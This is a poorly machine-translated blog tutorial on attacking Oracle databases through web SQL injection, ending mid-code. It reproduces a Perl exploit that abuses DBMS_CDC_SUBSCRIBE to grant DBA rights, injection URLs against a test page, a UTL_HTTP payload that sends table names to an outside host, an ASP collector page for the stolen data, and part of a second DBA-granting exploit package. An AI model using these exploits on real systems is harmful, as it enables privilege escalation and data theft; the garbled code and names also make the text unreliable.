Art of WEB-SQL-INJECTION 2nd ORACLE

Kindles blog

Many people say that asp php jsp injection is most directly related to databases! However, those scripts are only a helper.
For example, ASP/aspx jsp has no restrictions! However, PHP will filter it out, but if it is not mysql postgresql sqlite, this function will be useless!
However, I don't think these scripting languages are harsh ~ If CFM is used, it is estimated that you will not lose the discount! For more information about each database, see
Art of WEB-SQL-INJECTION 1st thanks to AMXSA and I .C.E for my support

OK. back to the point, the attack on ORACLE abroad has always been a concern, but there are not many researchers in China, or the technology is not enough ~ Here I will launch the first shot!
SQLINJECTION depends on the SQL parsing engine of the database. ORACLE does not support multi-statement execution!
If you use PLSQL, those tools can be used; To execute multiple statements!
That's because the tool has helped you submit multiple statements separately.
ORACLE injection has proposed some attack methods abroad, but there are not many ways to use web SQL injection!
In the early days, both ngs and ARGENISS proposed FUNCTION/PROCEDURE injection methods!
That is, some user-defined functions or stored procedures will store SQL-INJECTION
Let me use an MSSQL function as an example.
Create function ISTO_KJ021320 (@ SQL varchar (100 ))
RETURNS int
Begin
Exec (SELECT * FROM KJ021320 where name = + @ SQL + );
End
The above method undoubtedly does not filter the @ SQL parameter and SQL Injection exists!
This method is also outstanding in ORACLE, from user-defined functions to system functions.
The functions in the system package are generally used to operate some system tables! Normal users cannot query
However, you can call these system functions to obtain relevant information ~
It is easy to understand the ORACLE permission management mechanism

User ---> call a function (inheriting the permissions of the function creator) ---> execute an operation
So we only need to modify the operations in the function to add users and create DBA...

The methods published by milw0rm securityfocus for red database security are all very simple. The application is not explained ~
Let me copy it for a moment ~
For example
Dbms_cdc_subscribe.activate_subinjection this function of this package stores INJECTION
OK, the exploit published on milw0rm is a piece of PERL code.

Use warnings;
Use strict;
Use DBI;
Use Getopt: Std;
Use vars qw/% opt /;

Sub usage {
Print <"USAGE ";

Syntax: $0-h

Options:
-H -S <sid> target sid name
-U <user> user
-P <passwd> password

-G |-r (g) rant dba to user | (r) evke dba from user
[-P <port> Oracle port]

USAGE
Exit 0
}

My $ opt_string = h: s: u: p: grP :;
Getopts ($ opt_string, \ % opt) or & usage;
& Usage if (! $ Opt {h} or! $ Opt {s} or! $ Opt {u} or! $ Opt {p });
& Usage if (! $ Opt {g} and! $ Opt {r });
My $ user = uc $ opt {u };

My $ dbh = undef;
If ($ opt {P }){
$ Dbh = DBI-> connect ("dbi: Oracle: host = $ opt {h}; sid = $ opt {s}; port = $ opt {P }", $ opt {u}, $ opt {p}) or die;
} Else {
$ Dbh = DBI-> connect ("dbi: Oracle: host = $ opt {h}; sid = $ opt {s}", $ opt {u }, $ opt {p}) or die;
}

My $ sqlcmd = "grant dba to $ user ";
Print "[-] Wait ...";

If ($ opt {r }){
Print "[-] Revoking DBA from $ user ...";
$ Sqlcmd = "revoke dba from $ user ";
$ Dbh-> do ($ sqlcmd );
Print "[-] Done! ";
$ Dbh-> disconnect;
Exit;
}

Print "[-] Creating edevil function ...";
$ Dbh-> do (qq {
CREATE OR REPLACE FUNCTION OWN RETURN NUMBER
AUTHID CURRENT_USER
PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
Execute immediate $ sqlcmd; COMMIT;
RETURN (0 );
END;
});

Print "[-] Go... (dont worry about errors )! ";
My $…… = $ dbh-> prepare (qq {
BEGIN
SYS. dbms_cdc_subscribe.activate_subwn (| $ user. own | );
END;
});
$ Something-> execute;
$ Something-> finish;
Print "[-] you got the powah !! ";
$ Dbh-> disconnect;
Exit;

-------

The above method is to create a function named OWN first.
Grant dba to $ user grant dba permission TO a user!
And then to the stored procedure with Injection
SYS. DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION (put into the OWN function );
Because
Activate_sube_method Injection
Therefore, you will directly execute the own function to add a permission.
Here we need to create a function first! However, when we use web SQL inj, we cannot write multiple SQL statements to create a function!
How can this problem be solved?
Activate_sube_injection can also block the following statements! Similar to our WEB SQL INJ
How do I know how to detect and mine ORACLE function injection? Next time I will write an article about <detection function injection in ORACLE>

The above principles have been introduced!
I remember many articles saying that SQL statements are written like this.
Sqlstr = "begin select * from kj021320 where name = $ name; end ;";
Multiple statements can be executed! Actually, this is nonsense! Which of the following statements will write the code ~ Generally, SQL statements are directly operated.
Sqlstr = "select * from kj021320 where name = $ name ";
Therefore, in oracle web, SQL injection can only use functions, and stored procedures cannot be used! For more information, see the document.

There is an injection point on the web
Jsp? Id = 282 "> http: // 127.0.0.1: 8080/VOA/test. jsp? Id = 282 numeric type
First, confirm the user's permissions.
Http: // 127.0.0.1: 8080/VOA/test. jsp? Id = 282 and exists (select * from dba_tables)
Here is a small detail
ORACLE system table
Only users with DBA permissions starting with DBA can access DBA_USERS DBA_TABLES.
Generally, users can query
The two system tables user_tables and all_tables are their own tables! The latter is your own table and the table that someone else authorizes you to query!
Generally, the injection software only needs to query the two tables to obtain the user's table structure.

Returning to the above injection usually returns false!
It doesn't matter if you have the function injection permission ~
So how can we determine the location of the ORACLE host? That is to say, whether the IP address is the same machine as the WEB address
Then we adopt
The request function in the UTL_HTTP package
Example:
SELECT UTL_HTTP.request (http://www.isto.cn/getdata.asp? Data = | TABLE_NAME) FROM USER_TABLES where rownum <= 1
He will send the data as a URL request! For details about how to call remote data in a large database, see
Art of WEB-SQL-INJECTION 1st

So how can we construct this injection? Very easy!
Http: // 127.0.0.1: 8080/VOA/test. jsp? Id = 282 and 1in (SELECT UTL_HTTP.request (http://www.isto.cn/getdata.asp? Data = | TABLE_NAME) FROM USER_TABLES)
This way!
However, we have to construct a page to receive Request Parameters! Simple ASP implementation
<%
If request ("data") = "" then
Response. Write Application ("oracle_data ")
Else
Dim dataValue
DataValue = request. ServerVariables ("REMOTE_HOST") & "data:" & request ("data") & "<br>"
If request ("clear") <> "then
Application ("oracle_data") = dataValue
Else
Application ("oracle_data") = Application ("oracle_data") & dataValue
End if
End if
%>
Unless the database is in the Intranet, We can generally obtain its IP address and data ~ Faster than table guessing!

Next we can get his IP address and scan his ORA port SID to get it through the SELECT query or use tnscmd for detection!

Next, let me start with it!
An ODAY published abroad in
GET_DOMAIN_INDEX_TABLES does not seem to provide more exploitation information abroad.
That's all. Read the description at the time.

CREATE OR REPLACE
Package mybadpackage authid CURRENT_USER
IS
FUNCTION ODCIIndexGetMetadata (oindexinfo SYS. odciindexinfo, P3
VARCHAR2, p4 VARCHAR2, env SYS. odcienv)
Return number;
END;
/
CREATE OR REPLACE PACKAGE BODY MYBADPACKAGE
IS
FUNCTION ODCIIndexGetMetadata (oindexinfo SYS. odciindexinfo, P3
VARCHAR2, p4 VARCHAR2, env SYS. odcienv)
RETURN NUMBER
IS
Pragma autonomous_transaction;
BEGIN
Execute immediate grant dba to hacker;
COMMIT;
RETURN (1 );
END;
END;
/
DECLARE
INDE